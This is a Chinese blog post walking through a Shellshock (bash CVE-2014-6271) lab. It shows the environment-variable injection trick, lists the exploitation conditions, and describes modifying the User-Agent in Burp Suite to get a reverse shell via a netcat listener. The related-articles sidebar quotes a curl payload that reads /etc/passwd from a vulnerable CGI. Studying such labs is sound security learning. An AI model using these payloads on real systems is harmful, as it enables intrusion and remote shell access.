bash破壳漏洞反弹shell

最新推荐文章于 2024-05-28 13:53:41 发布
最新推荐文章于 2024-05-28 13:53:41 发布
阅读量4.8k 收藏 7
点赞数 2
分类专栏: 测试实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33020901/article/details/52065279
版权

0x00 破壳漏洞原理

在bash里边输入

~ export name='() { echo "inside name";}; echo "outside name";'

查看环境变量

~ env|grep name
~ name=() { echo "inside name";}; echo "outside name";

这时你会发现当进入子shell的时候,直接输出 outside name

~ bash
~ outside name

还要进入子shell才可以成功执行代码,于是问题来了
— 如果能一句话解决进入子shell并且输出就能利用—
然后聪明的黑客就尝试构造实现如此功能的语句

~ export name='() { :;}; echo outside name';bash

输入回车,直接显示输出的内容

~ outside name

0x01 利用条件
- web对bash进行调用,因为漏洞是存在bash里边的
- web会将我们可控的参数传入环境变量里边
- 确定目标bash版本是存在漏洞的
- 能够将返回结果返回过来

0x02 利用过程
首先登陆目标的网站,访问指定目录,发现确实在环境变量里边存入了我们访问的user-agent
这里写图片描述
然后进行构造user-agent,可以使用burpsuite抓包修改,或者火狐浏览器用user agent switch插件来修改
我这里使用burpsuite抓包,首先设置浏览器的代理
这里写图片描述
配置完成以后,再次访问目标网页,然后请求包就会在burpsuite里边被拦截,修改user-agent

当然,我们的目的是反弹一个shell回来,需要打开一个终端,然后监听user-agent里边所写的端口,这时候打开一个终端 输入
nc -l -p 8888 (-l 为监听模式 -p指定端口)
这里写图片描述
然后再burpsuite里边点击forward(转发),之后就可以看到刚才输入nc -l -p 8888
的下边出现了一个不属于自己的shell,到这里,就成功的反弹了一个shell
这里写图片描述

第一次认真记录过程,大牛绕过,同为小白,共同进步

PD_3569
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2014-6271 “破壳漏洞(cgi-bin)
墨痕诉清风的博客
07-19 2597
CVE-2014-6271(即“破壳漏洞)广泛存在与GNUBash版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。该漏洞利用条件较多,1.bash版本小于等于4.3,2.攻击者可以控制环境变量,3.新的bash进程被打开触发漏洞并执行命令。简单点说,没有cgi脚本继承环境变量,就玩不了;有cgi脚本的,bash版本过高也玩不了。catecho;do";};......
修复bash漏洞shell脚本分享
09-04
主要介绍了修复bash漏洞shell脚本分享,本文脚本适应常见的linux服务器系统,如CentOS、Debian、Ubuntu、OpenSuSE、Aliyun等系统,需要的朋友可以参考下
【vulhub】shellshock-bash破壳漏洞复现与利用
qq_45300786的博客
09-13 823
详细说明请看 https://www.cnblogs.com/cute-puli/p/14649873.html 楼主这里只做实验 3个exp exp1 curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://192.168.100.34:8080/victim.cgi exp2 User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id exp3 User-
Bash Bug(破壳漏洞Shellshock) - CVE-2014-6271
最新发布
HaSaKing的博客
05-28 535
破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
Shellshock-破壳漏洞bash命令执行 CVE-2014-6271
weixin_47536169的博客
08-29 1507
Shellshock-破壳漏洞bash命令执行 CVE-2014-6271
CVE-2014-6271-bash shellshock-破壳漏洞复现
m0_62008601的博客
08-06 3062
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
Bash Shellshock 破壳漏洞(CVE-2014-6271)
shierbai的博客
05-24 238
服务启动后,有两个页面`http://your-ip:8080/victim.cgi`和`http://your-ip:8080/safe.cgi`。其中safe.cgi是最新版bash生成的页面,victim.cgi是bash4.3生成的页面。将payload附在User-Agent中访问victim.cgi。safe.cgi则不行。然后构造payload。
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞
weixin_45095113的博客
12-21 420
vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞复现
破壳漏洞学习实验
kingkeenkai的博客
04-26 2195
今天在雪城大学的网络实验室学习了著名的破壳漏洞,下面分享一下对此漏洞进行的实战首先在vbox中,我们将两台虚拟机设置为在同一局域网段,不知道如何设置局域网段?点击这里然后我们在被攻击机上建立一个myprog.cgi的文件,在其中写入含有bash调用的代码#!/bin/bash echo "Content-type: text/plain" echo echo echo "Hello World" ...
bash(CVE-2014-6271) shellshock-破壳漏洞复现
weixin_45095113的博客
01-03 525
bash(CVE-2014-6271) shellshock-破壳漏洞复现
hacksudo靶机之(cgi-bin)破壳漏洞shell、GTFOBins提权、SQL注入
qq_40898302的博客
05-18 826
目标:取得 root 权限 + Flag。当前用户执行thor权限用户的脚本。用nmap去探测是否存在破壳漏洞。强制爆破cgi和sh结尾的文件。利用curl 定义函数执行命令。bash在解析的时候存在漏洞。登录thor并升级shell。用service提权root。查看thor的sudo权限。老版本的bash可以执行。
破壳漏洞修复步骤
10-10
破壳漏洞,又称为Shellshock漏洞,是一个严重的安全漏洞,影响了广泛使用的Bash shell。这个漏洞在2014年被发现,允许攻击者通过精心构造的环境变量注入恶意代码,从而控制受感染的系统。Bash是Unix和Linux系统中的...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
BASH(破壳漏洞)Redhat系统检测和修补
10-16
**BASH(破壳漏洞)详解** BASH,全称Bourne-Again SHell,是Linux和类UNIX系统中默认的命令行解释器,是用户与操作系统交互的重要工具。2014年,一个名为"Shellshock"的安全漏洞BASH中被发现,这被称为"BASH漏洞...
一次thinkphp任意代码执行
3569
07-26 3423
开始找网站,thinkphp 的网站一找一大堆,可怕 ... 更可怕的是并不是你找到的就能任意命令执行,需要一个网站一个网站的测试 ... 然后我就一个一个的试 , 好可怜啊 , 试了十几个才有一个可以利用的 ...   原理:  有问题的代码: $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\
IIS上传漏洞(实验环境)
3569
07-22 3097
文章提供参考 ,请不要利用技术去干坏事哟~ 好不容易找到了有模拟环境网站 ,就试验了好几个上传漏洞,这里先将IIS路径解析漏洞试验下 因为我打开的训练场名字就是IIS路径解析漏洞,所以直接奔主题 创建asp的一句话木马  更改文件名  1.asp 然后上传1.asp文件,并且提交 之后显示错误 ,如下 尝试用 burpsuite 抓包,修改文件路径
《我很简单,请不要欺负我》实验攻略
3569
07-29 2653
我本来准备自己写的,因为这里边太多坑了,我想好好记录下这次简单的却实际操作起来如此的艰难的实验 图片是一项很大的工程,我放弃了,在转载的时候只用别人的图片或删除他的或增加我的见解,加入自己见解,这算自己的东西了吧 他的实验中直接先是扫描后台,然后扫描Sql注入跑管理员账号密码,这是正确的步骤 然而我 ... 上来直接扫描后台 ,然后弱密码(admin888)直接登陆进去 ....
网站综合渗透实验 writeup
3569
07-30 2432
感受 ,做这些实验主要难点我感觉就是上传webshell 了,他插入shell的姿势让我防不胜防,这里插那里插,上一个实验还需要闭合引号,这个实验不用闭合引号,上个实验路径比较简单,这个实验路径比较复杂,尤其是 bear.asp的文件是数据库文件 … 想了好久才想通,到底为什么不用闭合引号 … 为什么路径是/db/bear.asp … 上传sehll有两种方法,都学习了是不吃亏的哦 ~实验过程 :
bash实现反弹shell
09-19
bash命令可以实现反弹shell的功能。通过使用`bash -i`命令,可以创建一个交互式的bash shell,允许用户与shell进行交互,输入命令并接收回显。这种交互式的过程可以实现反弹shell的功能,使用户可以远程控制目标系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值